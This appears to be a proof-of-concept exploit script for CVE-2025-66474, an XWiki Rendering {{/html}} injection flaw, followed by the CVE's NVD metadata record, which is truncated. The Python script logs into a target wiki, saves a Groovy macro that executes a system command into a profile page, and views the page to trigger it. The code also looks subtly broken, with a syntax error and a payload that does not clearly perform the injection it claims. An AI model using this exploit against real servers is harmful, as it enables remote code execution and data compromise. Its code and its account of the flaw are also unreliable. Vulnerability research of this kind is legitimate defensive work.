CVE-2025-66474

'''CVE-2025-66474 XWiki RCE PoC Vulnerable versions: XWiki Rendering <= 16.10.9, 17.0.0-rc-1 to 17.4.2, 17.5.0-rc-1 to 17.5.0 Reference: https://github.com/xwiki/xwiki-rendering/security/advisories/GHSA-9xc6-c2rm-f27p ''' import requests import sys TARGET_URL = "http://target-xwiki-instance.com" USERNAME = "attacker" PASSWORD = "attacker_password" def exploit_cve_2025_66474(): """ Exploit for XWiki Rendering {{/html}} injection leading to RCE The attacker injects a Groovy script macro through HTML injection """ session = requests.Session() # Step 1: Login to XWiki login_url = f"{TARGET_URL}/bin/login/XWiki/XWikiLogin" login_data = { "j_username": USERNAME, "j_password": PASSWORD, "xredirect": "/" } session.post(login_url, data=login_data) # Step 2: Inject malicious content via {{/html}} tag # The payload uses HTML injection to embed a Groovy script macro groovy_payload = '''{{groovy}} import java.io.* def cmd = "whoami" def p = Runtime.getRuntime().exec(cmd) p.waitFor() println new BufferedReader(new InputStreamReader(p.getInputStream())).readLine() {{/groovy}}''' # HTML injection payload with {{/html}} tag exploit_content = f '''{{html}} {groovy_payload} {{/html}}''' # Step 3: Create or edit a document with the malicious content doc_url = f"{TARGET_URL}/bin/edit/XWiki/UserProfile/{USERNAME}" doc_data = { "content": exploit_content, "action": "save" } response = session.post(doc_url, data=doc_data) # Step 4: Trigger the vulnerability by viewing the document view_url = f"{TARGET_URL}/bin/view/XWiki/UserProfile/{USERNAME}" session.get(view_url) print("[+] Exploit sent. Check server for command execution.") return True if __name__ == "__main__": exploit_cve_2025_66474()

{"cve": {"id": "CVE-2025-66474", "sourceIdentifier": "[email protected]", "published": "2025-12-10T22:16:28.003", "lastModified": "2025-12-19T17:13:41.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XWiki Rendering is a generic rendering system that converts textual input in a given syntax (wiki syntax, HTML, etc) into another syntax (XHTML, etc). Versions 16.10.9 and below, 17.0.0-rc-1 through 17.4.2 and 17.5.0-rc-1 through 17.5.0 have insufficient protection against {{/html}} injection, which attackers can exploit through RCE. Any user who can edit their own profile or any other document can execute arbitrary script macros, including Groovy and Python macros, which enable remote code execution as well as unrestricted read and write access to all wiki contents. This issue is fixed in versions 16.10.10, 17.4.3 and 17.6.0-rc-1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-95"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xwiki:xwiki-rendering:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.10.10", "matchCriteriaId": "72CCDDF1-82EF-43BB-8A50-AB4FEBF86DB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:xwiki:xwiki-rendering:*:*:*:*:*:*:*:*", "versionStartIncluding": "17.0.0", "versionEndExcluding": "17.4.3", "matchCriteriaId": "BAFE697A-6548-4734-9BB9-1F9D5B39B6F6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:xwiki:xwiki-rendering:17.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "C6245F8B-C8B0-4818-A7BA-E2FA27E08C20"}, {"vulnerable": true, "criteria": "cpe:2.3:a:xwiki:xwiki-rendering:17.5.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "6A81FD5E-9EDD-4A70-A3CF-81E0FADCD720"}]}]}], "references": [{"url": "https://github.com/xwiki/xwiki-platform/commit/12b780ccd5bca5fc8f74f46648d7e02fa04fbc11", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/xwiki/xwiki-rendering/commit/9b71a2ee035815cfc29cebbfe81dbdd98f941d49", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/xwiki/xwiki-rendering/security/advisories/GHSA-9xc6-c2rm-f27p", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://jira.xwiki.org/browse/XRENDERING-693", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}, {"url": "https://jira.xwiki.org/browse/XRENDERING-792", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}, {"url": "https://jira.xwiki.org/browse/XRENDERING-793", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}, {"url": "https://jira.xwiki.org/browse/XWIKI-23378", "source": "security-advisories@git ... (truncated)